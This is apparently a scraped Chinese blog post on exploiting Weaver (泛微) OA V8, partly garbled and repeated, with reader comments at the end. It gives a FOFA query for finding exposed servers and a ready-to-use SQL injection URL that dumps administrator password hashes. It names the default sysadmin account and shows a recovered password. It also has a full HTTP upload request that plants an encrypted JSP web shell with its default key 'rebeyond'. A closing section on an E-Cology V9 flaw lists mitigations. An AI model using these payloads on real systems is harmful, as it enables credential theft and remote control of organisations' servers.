app="泛微-协同办公OA"
SQL注入
在泛微OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法。其中它存在四个参数,分别为空字符串、cmd参数值、request对象以及serverContext对象,通过对cmd参数值进行判断,当cmd值等于getSelectAllId时,再从请求中获取sql和type两个参数值,并将参数传递进getSelectAllIds(sql,type)方法中,从而在前台构造POC语句:
http://xxx.xxx.xxx.xxx/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager
访问存在漏洞的网站:http://x.x.x.x/login/Login.jsp?logintype=1,其中该特征属于泛微OA v8系统
通过sql注入获得密码
http://x.x.x.x/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager
得到密码之后MD5解密
账号一般是
sysadmin
漏洞位于: /page/exportImport/uploadOperation.jsp文件中
Jsp流程大概是:判断请求是否是multipart请求,直接上传。
重点关注File file=new File(savepath+filename),
Filename参数,是前台可控的,并且没有做任何过滤限制
然后请求 然后请求路径:
page/exportImport/fileTransfer/1.jsp
POST /page/exportImport/uploadOperation.jsp HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 397
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.68
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6XgyjB6SeCArD3Hc
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
dnt: 1
x-forwarded-for: 127.0.0.1
Connection: close
------WebKitFormBoundary6XgyjB6SeCArD3Hc
Content-Disposition: form-data; name="file"; filename="demo.jsp"
Content-Type: application/octet-stream
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
------WebKitFormBoundary6XgyjB6SeCArD3Hc--
地址: /page/exportImport/fileTransfer/demo.jsp
默认密码 rebeyond
fofa语句app="泛微-协同办公OA"SQL注入在泛微OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法。其中它存在四个参数,分别为空字符串、cmd参数值、request对象以及serverContext对象,通过对cmd参数值进行判断,当cmd值等于getSelectAllId时,再从请求中获取sql和type两个参数值,并将参数传递进getSelectAllIds
漏洞
复现
在getdata.jsp中,直接将request对象交给
weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) :
在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法
app="
泛微
-协同办公
OA
"
http://url/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%201234%20as%20id
http://url/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager
MD5解码
sysadmin/Magimix123
泛微
OA
E-Cology V9是一款常用的企业办公自动化系统,该系统的browser.jsp页面存在
SQL注入
漏洞
。
SQL注入
是一种常见的网络攻击技术,攻击者可以通过构造恶意的SQL语句来绕过系统的认证和授权机制,进而获取敏感数据或者对系统进行非法操作。
泛微
OA
E-Cology V9中的browser.jsp页面是用于显示
OA
系统中的个人文件夹和公共文件夹。攻击者可以在该页面中输入恶意的SQL语句,通过执行这些恶意SQL语句,攻击者可以获取到不应该被访问的数据,比如其他用户的文件,甚至可以对数据库进行修改和损坏。
为了防止
SQL注入
漏洞
的利用,可以采取以下措施:
1. 输入过滤和验证:在服务器端对用户输入的数据进行过滤和验证,去除或转义可能包含恶意SQL代码的字符,确保只接受合法的输入。
2. 使用参数化查询:尽量使用参数化查询代替拼接SQL语句的方式,参数化查询可以预编译SQL语句,避免在拼接时引入恶意代码。
3. 限制数据库用户的权限:对数据库用户进行权限控制,确保每个用户只拥有最小必要的权限,减少攻击者利用
SQL注入
漏洞
进行非法操作的机会。
4. 及时更新和修补
漏洞
:及时跟进厂商的
安全
通告并安装最新的补丁程序,确保系统始终处于最新的
安全
状态。
综上所述,
泛微
OA
E-Cology V9中的browser.jsp页面存在
SQL注入
漏洞
,但通过合理的
安全
措施和注意事项,我们可以有效地减少该
漏洞
被利用的风险。
CSDN-Ada助手:
泛微OA V8 SQL注入漏洞和文件上传漏洞
路人甲42:
OWASP top10 漏洞
猫猫躁躁:
OWASP top10 漏洞
热爱画家夫人:
